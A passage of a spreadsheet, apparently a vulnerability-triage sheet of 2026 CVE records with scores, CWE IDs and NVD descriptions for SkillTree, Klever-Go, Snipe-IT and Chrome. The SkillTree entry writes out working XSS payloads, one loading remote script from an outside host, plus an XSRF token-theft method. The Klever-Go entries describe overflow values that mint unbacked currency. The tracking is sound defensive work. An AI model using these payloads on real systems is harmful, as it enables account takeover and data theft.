          <t>SkillTree is a micro-learning gamification platform. Prior to version 4.4.2, two independent code flaws combine into a single exploitable attack chain, with three distinct exploitation paths of escalating impact. `StringHighlighter.js` builds an HTML string by interpolating raw `value` substrings directly into a template literal with no HTML entity encoding. `HighlightedValue.vue` renders that string — and all unfiltered plain values — via Vue's `v-html` directive, which sets `innerHTML`. Separately, the account registration endpoint accepts `firstName`, `lastName`, and `nickname` fields and stores them without any HTML sanitization. An attacker self-registers with `firstName = "&lt;img src=x onerror=alert(1)&gt;"` (28 characters — within the 30-character field limit) and visits any quiz. The next time an administrator opens the Quiz Runs page the payload executes in their browser. Three attack paths exist with escalating impact. The first is basic cross-site scripting. Any self-contained payload fitting the 30-character limit (e.g. `&lt;img src=x onerror=alert(1)&gt;`, which is 28 chars) fires automatically when the admin navigates to the runs page through normal use. Arbitrary code execution in the admin's browser is confirmed with zero extra steps. The second is remote script loading via `import()`. Using the split-field technique (`lastName = "&lt;img src=x"`, `firstName = "onerror=import('//nsas.cc/p')&gt;"`), the attacker loads a full JavaScript file from their server. The file has no size limit and can perform any admin action — delete all projects, create backdoor accounts, dump user data, install a keylogger. No phishing required. The only constraint is that the URL must fit in 11 characters (`//nsas.cc/p`). The third is full cross-site request forgery token theft. Using `eval(name)`, the attacker pre-sets `window.name` to a data-theft payload by sending the admin one redirect link first. The session cookie is `HttpOnly` and cannot be read via `document.cookie`; however, the XSRF token is readable and the attacker leverages same-origin execution to call admin APIs from inside the victim's browser, relaying the responses to an external server. No admin interaction beyond routine use is required. Version 4.4.2 contains a patch.</t>
        </is>
      </c>
      <c r="S62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54694</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54754</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr"/>
      <c r="Q63" s="5" t="inlineStr">
        <is>
          <t>CWE-191, CWE-367, CWE-682</t>
        </is>
      </c>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.19, marketplace settlement in core/kapp/market/market.go reads MarketOrderData.ReferralPercentage from the listing while reading asset.Royalties.MarketPercentage live at purchase time. An asset owner can create a valid listing and then use AssetTrigger UpdateRoyalties to make the combined referral and royalty percentages exceed the bid. executeBuyMarket pays referral and royalty amounts unconditionally while computeMarketOwnerAmount silently skips a nonpositive seller remainder, allowing MarketBuy, BuyItNow, or auction Claim settlement to credit more KLV or sale currency than the buyer paid. This can create unbacked currency and corrupt token supply integrity. This issue is fixed in version 1.7.19.</t>
        </is>
      </c>
      <c r="S63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54754</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54755</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr"/>
      <c r="Q64" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.19, split-royalty fields decoded in core/kapp/builtInFunctions/utils.go can contain values greater than core.HundredPercent, and core/kapp/kda/create.go and core/kapp/kda/trigger.go sum those values in uint32 accumulators. Crafted values such as two 0x80000000 entries wrap the validation sum to zero and pass CheckValid100Params. Royalty payout paths in core/kapp/accounts/accounts.go, core/kapp/market/market.go, and core/kapp/ito/ito.go then credit each oversized split amount and silently discard a negative remainder, allowing ordinary asset transfers, marketplace purchases, or ITO purchases to create unbacked KLV or other assets. This issue is fixed in version 1.7.19.</t>
        </is>
      </c>
      <c r="S64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54755</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86751</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr"/>
      <c r="Q65" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly sanitize markdown image syntax in note fields, allowing authenticated users to read arbitrary server files and issue server-side HTTP requests. Attackers can submit markdown image syntax in checkout acceptance notes that survive HTML escaping, are expanded by CommonMark parser, and resolved by laravel-mail-auto-embed via file_get_contents or curl, exfiltrating sensitive files like .env containing APP_KEY.</t>
        </is>
      </c>
      <c r="S65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86751</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87438</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr"/>
      <c r="Q66" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in WebGL in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="S66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87438</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87448</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr"/>
      <c r="Q67" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>Use after free in DevTools in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87448</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87455</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr"/>
      <c r="Q68" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>Use after free in Aura in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87455</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87464</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr"/>
      <c r="Q69" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>Use after free in WebGL in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="S69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87464</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87470</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr"/>
      <c r="Q70" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>Improper quantity validation in Tint in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87470</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87474</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr"/>
      <c r="Q71" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>Use after free in Payments in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87474</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87488</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr"/>
      <c r="Q72" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>Use after free in WebGL in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="S72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87488</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87492</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr"/>
      <c r="Q73" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in DevTools in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87492</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87494</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr"/>
      <c r="K74" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr"/>
      <c r="Q74" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>Use after free in Browser in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87494</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87500</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr"/>
      <c r="Q75" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>Improper validation of array index in ANGLE in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87500</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87504</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr"/>
      <c r="Q76" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>Use after free in Core in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to execute arbitrary code outside the sandbox via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87504</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87512</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr"/>
      <c r="Q77" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>Use after free in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87512</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87520</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L78" s="5" t="inlineStr"/>
